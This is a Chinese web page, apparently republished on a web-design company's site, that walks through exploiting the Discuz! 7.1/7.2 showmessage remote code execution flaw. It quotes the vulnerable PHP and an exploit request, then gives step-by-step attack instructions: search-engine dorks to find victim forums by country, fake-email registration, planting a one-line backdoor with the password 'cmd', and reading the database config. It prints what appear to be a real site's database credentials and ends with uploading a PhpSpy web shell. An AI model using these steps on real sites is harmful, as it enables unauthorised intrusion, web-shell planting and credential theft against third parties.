盗墓笔记第二季,玄幻小说改编的电视剧,手机推荐排行榜

新聞中心

這里有您想知道的互聯(lián)網(wǎng)營銷解決方案

DZ7.1and7.20遠(yuǎn)程代碼執(zhí)行漏洞獲取Webshell

【.com 獨(dú)家特稿】Crossday Discuz! Board 論壇系統(tǒng)（簡稱 Discuz! 論壇）是一個(gè)采用 PHP 和 MySQL 等其它多種數(shù)據(jù)庫構(gòu)建的高效論壇解決方案。作為商業(yè)軟件產(chǎn)品， Discuz! 在代碼質(zhì)量，運(yùn)行效率，負(fù)載能力，安全等級，功能可操控性和權(quán)限嚴(yán)密性等方面有著良好的口碑。對于站長而言，利用 Discuz! 均能夠在最短的時(shí)間內(nèi)，花費(fèi)最低的費(fèi)用，采用最少的人力，架設(shè)一個(gè)性能優(yōu)異、功能全面、安全穩(wěn)定的社區(qū)論壇平臺(tái)。它能運(yùn)行于Windows平臺(tái)和Linux平臺(tái)，目前已經(jīng)有超過100萬的用戶。在本文以前Discuz! 論壇即時(shí)有漏洞也因?yàn)榉N種原因難以獲取Webshell，而本次出現(xiàn)的漏洞只要是注冊用戶即可輕松獲取Webshell。在Discuz！ 7.1與7.2版本中的showmessage函數(shù)，由于eval中執(zhí)行的參數(shù)未初始化，可以任意提交，從而可以執(zhí)行任意PHP命令。該漏洞的首發(fā)是T00ls核心團(tuán)隊(duì)，下面來分析下這個(gè)遠(yuǎn)程代碼執(zhí)行漏洞，這個(gè)問題真的很嚴(yán)重，可以直接寫shell。

創(chuàng)新互聯(lián)公司專注于企業(yè)營銷型網(wǎng)站建設(shè)、網(wǎng)站重做改版、淳安網(wǎng)站定制設(shè)計(jì)、自適應(yīng)品牌網(wǎng)站建設(shè)、H5頁面制作、商城開發(fā)、集團(tuán)公司官網(wǎng)建設(shè)、外貿(mào)網(wǎng)站制作、高端網(wǎng)站制作、響應(yīng)式網(wǎng)頁設(shè)計(jì)等建站業(yè)務(wù)，價(jià)格優(yōu)惠性價(jià)比高，為淳安等各大城市提供網(wǎng)站開發(fā)制作服務(wù)。

一、漏洞來自showmessage函數(shù)
function showmessage($message, $url_forward = '', $extra = '', $forwardtype = 0) {
extract($GLOBALS, EXTR_SKIP);//危險(xiǎn)的用法，未初始化的變量可以直接帶進(jìn)函數(shù)，直接導(dǎo)致了問題產(chǎn)生，from www.oldjun.com
global $hookscriptmessage, $extrahead, $discuz_uid, $discuz_action, $debuginfo, $seccode, $seccodestatus, $fid, $tid, $charset, $show_message, $inajax, $_DCACHE, $advlist;

    define('CACHE_FORBIDDEN', TRUE);
    $hookscriptmessage = $show_message = $message;$messagehandle = 0;
    $msgforward = unserialize($_DCACHE['settings']['msgforward']);
    $refreshtime = intval($msgforward['refreshtime']);
    $refreshtime = empty($forwardtype) ? $refreshtime : ($refreshtime ? $refreshtime : 3);
    $msgforward['refreshtime'] = $refreshtime * 1000;
    $url_forward = empty($url_forward) ? '' : (empty($_DCOOKIE['sid']) && $transsidstatus ? transsid($url_forward) : $url_forward);
    $seccodecheck = $seccodestatus & 2;
    if($_DCACHE['settings']['funcsiteid'] && $_DCACHE['settings']['funckey'] && $funcstatinfo && !IS_ROBOT) {
        $statlogfile = DISCUZ_ROOT.'./forumdata/funcstat.log';
        if($fp = @fopen($statlogfile, 'a')) {
            @flock($fp, 2);
            if(is_array($funcstatinfo)) {
                $funcstatinfo = array_unique($funcstatinfo);
                foreach($funcstatinfo as $funcinfo) {
                    fwrite($fp, funcstat_query($funcinfo, $message)."\n");
                }
            } else {
                fwrite($fp, funcstat_query($funcstatinfo, $message)."\n");
            }
            fclose($fp);
            $funcstatinfo = $GLOBALS['funcstatinfo'] = '';
        }
    }
    if(!defined('STAT_DISABLED') && STAT_ID > 0 && !IS_ROBOT) {
        write_statlog($message);
    }
    if($url_forward && (!empty($quickforward) || empty($inajax) && $msgforward['quick'] && $msgforward['messages'] && @in_array($message, $msgforward['messages']))) {
        updatesession();
        dheader("location: ".str_replace('&', '&', $url_forward));
    }
    if(!empty($infloat)) {
        if($extra) {
            $messagehandle = $extra;
        }
        $extra = '';
    }
    if(in_array($extra, array('HALTED', 'NOPERM'))) {
        $discuz_action = 254;
    } else {
        $discuz_action = 255;
    }
    include language('messages');
    $vars = explode(':', $message);//只要含:就可以了
    if(count($vars) == 2 && isset($scriptlang[$vars[0]][$vars[1]])) {//兩個(gè)數(shù)字即可，用:分割
        eval("\$show_message = \"".str_replace('"', '\"', $scriptlang[$vars[0]][$vars[1]])."\";");//$scriptlang未初始化，可以自定義，from www.oldjun.com
    } elseif(isset($language[$message])) {
        $pre = $inajax ? 'ajax_' : '';
        eval("\$show_message = \"".(isset($language[$pre.$message]) ? $language[$pre.$message] : $language[$message])."\";");
        unset($pre);
    }
    ...... }

#p#

二、DZ的全局機(jī)制導(dǎo)致了未初始化的參數(shù)可以任意提交

foreach(array('_COOKIE', '_POST', '_GET') as $_request) {

foreach($$_request as $_key => $_value) {

$_key{0} != '_' && $$_key = daddslashes($_value);

}

#p#

三、misc.php正好有個(gè)可以自定義message的點(diǎn)，其實(shí)也是未初始化：

elseif($action == 'imme_binding' && $discuz_uid) {

if(isemail($id)) {

$msn = $db->result_first("SELECT msn FROM {$tablepre}memberfields WHERE uid='$discuz_uid'");

$msn = explode("\t", $msn);

$id = dhtmlspecialchars(substr($id, 0, strpos($id, '@')));

$msn = "$msn[0]\t$id";

$db->query("UPDATE {$tablepre}memberfields SET msn='$msn' WHERE uid='$discuz_uid'");

showmessage('msn_binding_succeed', 'memcp.php');

} else {

if($result == 'Declined') {

dheader("Location: memcp.php");

} else {

showmessage($response['result']);//$response沒有初始化，可以自定義，from www.oldjun.com

}

#p#

四、漏洞利用
showmessage函數(shù)里$vars = explode(':', $message);然后message可以自己控制，于是就很容易了，參數(shù)是兩個(gè)自定義的數(shù)組。注冊一個(gè)用戶登陸,然后提交misc.php?action=imme_binding&response[result]=1:2&scriptlang[1][2]={${phpinfo()}}

#p#

五、漏洞的具體應(yīng)用

1.搜索“Powered by Discuz!7.2”
在Google中進(jìn)行Discuz!7.2的定位搜索，在Google輸入框中輸入“Powered by Discuz!7.2 site:kr”搜索韓國的Discuz!7.2版本的站點(diǎn)，如圖1所示，結(jié)果出來有3380條記錄。想搜索哪個(gè)國家的就直接在site后面進(jìn)行變更，例如搜索國內(nèi)的網(wǎng)站：“site:com.cn”，政府網(wǎng)站“site:org.cn”。

圖1定位搜索Discuz!7.2版本的論壇

#p#

2.驗(yàn)證并注冊論壇用戶

在圖1中從第一個(gè)往最末記錄，依次打開搜索記錄，如圖2所示，第一個(gè)記錄技能打開，而且在其中還顯示為中文，單擊注冊鏈接，注冊為開論壇的一個(gè)用戶。注冊用戶時(shí)用戶名和密碼可以隨意選取，只要不重復(fù)即可，如果不想接收網(wǎng)站的注冊信件，防止被他人利用電子郵件進(jìn)行其它活動(dòng)可以使用假的郵件地址，如圖3所示，總之目的只有一個(gè)那就是成為該論壇的會(huì)員，便于后期得到Webshell。

圖2 查看搜索結(jié)果

圖3 注冊用戶

#p#

3.修改exp代碼中的地址

discuz7.2 exp是由T00ls.net放出來的，呵呵，版權(quán)屬于他們哦！如圖4所示，在修改action的地址為“http://**********.co.kr/dc/misc.php”，該地址是misc.php的實(shí)際地址，修改完畢后保存即可。

圖4修改exp代碼中的地址

#p#

4.獲取TID并提交

用戶注冊成功后，在論壇中通過觀看最新帖子可以看到地址欄中包含有TID一項(xiàng)，例如“http://www.antian365.com/redirect.php?tid=5634&goto=lastpost#lastpost”，其中的tid為“5634”。Tid顧名思義就是帖子ID。獲取該ID后在exp中將該ID輸入后進(jìn)行提交，如圖5所示。

圖5 獲取tid并將其放入exp中進(jìn)行提交

技巧：
（1）在有些大的論壇中由于使用了優(yōu)化技術(shù)，因此論壇的頁面都是靜態(tài)的，在靜態(tài)的頁面中是看不到tid的，例如“http://bbs./thread-648810-1.html”，但當(dāng)鼠標(biāo)移動(dòng)到回復(fù)按鈕處時(shí)會(huì)給出一個(gè)地址，該地址中包含有tid。
（2）Exp提交成功后會(huì)出現(xiàn)一些提示，如果給出“Binding Failed.Visit MSN IMME Q&A,Please.”提示，如圖6所示，則說明該系統(tǒng)已經(jīng)修補(bǔ)了漏洞或者采取了一些安全措施，無法再進(jìn)行利用。

圖6 未能成功的exp

（3）一句話木馬成功與否的測試。直接在論壇地址后加上“/forumdata/cache/usergroup_01.php”進(jìn)行訪問，例如某網(wǎng)站的論壇地址為：
http://www.xxx.com.hk/discuz/，則一句話后門的地址為：
http://www.xxx.com.hk/discuz/forumdata/cache/usergroup_01.php
如果訪問后未出現(xiàn)錯(cuò)誤提示，那么恭喜你，成功了！
#p#

5.獲取Webshell

如圖7所示，在“l(fā)anker一句話PHP后門客戶端3.0內(nèi)部版”的后門地址中輸入剛才提交的地址“http://**********.co.kr/dc/forumdata/cache/usergroup_01.php”，密碼是“cmd”。在模塊中選擇查看服務(wù)器基本信息，如圖7所示，獲悉該系統(tǒng)為linux系統(tǒng)以及該網(wǎng)站所在的文件路徑。

圖7 一句話后門執(zhí)行成功

#p#

6.讀取數(shù)據(jù)庫連接文件

在模塊中選擇讀取文件，并輸入數(shù)據(jù)庫連接文件的地址“****/dc/config.inc.php”，如圖8所示，成功獲取該論壇數(shù)據(jù)庫的敏感信息：
$dbhost = 'localhost'; // 數(shù)據(jù)庫服務(wù)器
$dbuser = 'skycheer'; // 數(shù)據(jù)庫用戶名
$dbpw = 'sky0127'; // 數(shù)據(jù)庫密碼
$dbname = 'skycheer'; // 數(shù)據(jù)庫名
$pconnect = 0;

圖8獲取論壇數(shù)據(jù)庫連接信息

#p#

7.上傳大馬

使用一句話管理實(shí)在是不方便，在功能模塊中選擇上傳文件，使用空的路徑直接將本地的大馬上傳到一句話木馬所在的路徑，上傳成功后直接訪問，如圖9所示，成功得到我們熟悉的PhpSpy ver 2008界面。至此已經(jīng)獲取Discuz！7.2版本的Webshell，大家都知道Discuz！論壇的Webshell很難拿到，因此本漏洞的珍稀程度可想而知。

圖9 上傳大馬

#p#

8.后記

Discuz！7.1&7.2遠(yuǎn)程溢出漏洞出來后，國內(nèi)有關(guān)Discuz！的大中小論壇基本沒有什么幸免，安全做的好的去掉了cache的執(zhí)行權(quán)限，將其權(quán)限設(shè)置為無，逃過劫難。

當(dāng)前題目：DZ7.1and7.20遠(yuǎn)程代碼執(zhí)行漏洞獲取Webshell
當(dāng)前地址：http://m.fisionsoft.com.cn/article/coieijc.html

新聞中心

其他資訊